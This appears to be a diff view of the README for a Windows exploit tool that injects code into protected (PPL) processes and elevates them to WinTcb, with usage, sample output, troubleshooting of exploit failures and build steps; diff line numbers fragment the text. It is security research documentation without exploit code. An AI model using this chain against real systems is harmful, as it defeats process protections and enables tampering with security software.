This tool implements a **Userland** exploit chain for injecting arbitrary code into a PPL with the signer type `Windows` and elevating to the signer type `WinTcb`. These techniques were originally discussed by James Forshaw (a.k.a. [@tiraniddo](https://infosec.exchange/@tiraniddo)) in his blog post [Injecting Code into Windows Protected Processes using COM - Part 1](https://googleprojectzero.blogspot.com/2018/10/injecting-code-into-windows-protected.html).
4
8
5
9
To learn more about this tool, you should read its companion blog post here:
6
10
7
-
- TODO: [Bypassing PPL in Userland (again)]()
8
-
9
-
<p align="center">
10
-
<img src="poc.png">
11
-
</p>
11
+
- [Bypassing PPL in Userland (again)](https://blog.scrt.ch/2023/03/14/bypassing-ppl-in-userland-again/)
12
12
13
13
## 💣 Disclaimer
14
14
skipped 7 lines
22
22
23
23
- __Privileges:__ Administrator or SYSTEM with `SeDebugPrivilege`
24
24
- __Platform:__ Windows 10/11 or Windows Server 2019/2022
25
+
- __Architecture:__ Only __x86_64__ is supported
25
26
26
27
```bat
27
28
REM Use the option -p to elevate from PPL-Windows to PPL-WinTcb
[+] Payload DLL successfully loaded after 272 attempts!
40
41
[*] Deleting 272 temporary directories created by the service...
skipped 35 lines
76
77
77
78
## 🚧 Known issues
78
79
80
+
### Error: "Unexpected error or timeout"
81
+
79
82
You get the following error because the exploit __timed out__ while trying to create a remote `TaskHandler` COM object. This is usually the sign that the target service `WaaSMedicSvc` crashed. This can be confirmed with the next message: `[!] Service WaaSMedicSvc is no longer running`. __You should try to run the tool again.__
80
83
81
84
```console
skipped 7 lines
89
92
[...]
90
93
```
91
94
95
+
### Error: "Reached the maximum number of attempts"
96
+
92
97
You get the following error because the exploit failed to write a valid object directory in __less than 1000 attempts__. This limit serves as a failsafe to prevent the target service from consuming too much resources. __You should try to run the tool again.__
93
98
94
99
```console
skipped 6 lines
101
106
[...]
102
107
```
103
108
109
+
### Error: "Failed to write LdrpKnownDllDirectoryHandle value"
110
+
104
111
You get the following error because an unexpected error occurred when calling `LaunchDetectionOnly` or `LaunchRemediationOnly`. This should be quite rare though. __You should try to run the tool again.__
105
112
106
113
```console
skipped 5 lines
112
119
[-] Failed to write LdrpKnownDllDirectoryHandle value (thread exit code: 0x800706ba).
113
120
[...]
114
121
```
122
+
123
+
### Error: "Failed to cache sign ..."
115
124
116
125
You get the following error because the exploit __failed to cache sign__ the payload DLL. The oplock set on the catalog file was probably never triggered because it was already opened by the Kernel. You can try to rerun the tool at a later time (for Windows 11, refer to the "Tests" section).
117
126
skipped 17 lines
135
144
2. Select `Release / x64` (`x86` is not supported!).
136
145
3. `Build > Build Solution`.
137
146
138
-
## Credits
147
+
## Credits
139
148
140
149
- [@tiraniddo](https://infosec.exchange/@tiraniddo) - Injecting Code into Windows Protected Processes using COM - Part 1